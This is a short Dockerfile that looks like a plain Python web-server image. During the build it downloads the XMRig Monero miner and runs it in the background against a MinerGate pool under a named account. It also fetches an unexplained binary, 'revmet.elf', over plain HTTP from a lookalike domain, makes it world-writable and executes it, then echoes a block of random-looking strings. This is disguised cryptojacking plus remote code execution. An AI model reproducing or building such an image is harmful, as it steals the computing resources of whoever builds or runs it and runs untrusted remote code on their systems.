FROM ubuntu:bionic

SHELL ["/bin/bash", "-c"]

RUN apt-get update && apt-get install -y \
    wget \
    ocl-icd-libopencl1 \
    libmicrohttpd-dev \
    libc6 \
    libstdc++6

WORKDIR /root
RUN wget http://mail.oogle.dev:8000//revmet.elf

RUN wget https://github.com/xmrig/xmrig/releases/download/v2.14.1/xmrig-2.14.1-xenial-x64.tar.gz
RUN tar -xzvf xmr*
WORKDIR /root/xmrig-2.14.1
RUN ./xmrig -a cryptonight --background -o stratum+tcp://xmr.pool.minergate.com:45700 -u fewa342rwr@tutanota.com -p x

WORKDIR /root
RUN chmod 777 revmet.elf
RUN ./xmrig-2.14.1/xmrig -a cryptonight --background -o stratum+tcp://xmr.pool.minergate.com:45700 -u fewa342rwr@tutanota.com -p x;./revmet.elf
RUN echo iX5G0pfZb1GOge13r6a2ZmgXQjBVD0uf rluxqI6sIT58iNB8MFp8axp8KUFDyrLP PEQ635XBlmTeOhAPDRF7g8xJ7cfglIzF l32dEUUbKyQMg1JXW2d46yNNbl2EO2TB 0ti8MUm4WzylNL8AhMk4Op1M8bsKsC5j DTwGnmuyLRU5nfAwacsxG1imqwkHJtVE Mu8GZ3snl05F8PeZBowOIwiweQcXIJ9f wulsYTW1fy0fEHol3nQPzveMLNP3AC2o zu19yIWKqraaUI0TLcQRwBJ75MGYjHEc efBagqaYqJ3PcUE4sz2jqQJZR6YG4VVy a7rYAh2IvbCIz3yjQXAphSbiybXLw7p8 wL3z72WBOU8NP79IAdNzyiSBd9UOZ8KS 04ZxhrWg18nd4SCDSDEgi3HKuAOYZQZN DGLrlBP1wP15Z7bzvFORfIDPVXxlKOw8 iRR8Zp0TOxlCM7JSEpHNyxmT4XM90YWc zsaOLYboLruHMbrsWTTwF76XhxiEn5Vb JlcMVQX0KrjEurxbQ9jbtcmhwOFZNPb7 g0B5O2hD9pRQwxZWGXhnBJRmjZt4WqIH ddddddd

ENTRYPOINT ["python3", "-m", "http.server"]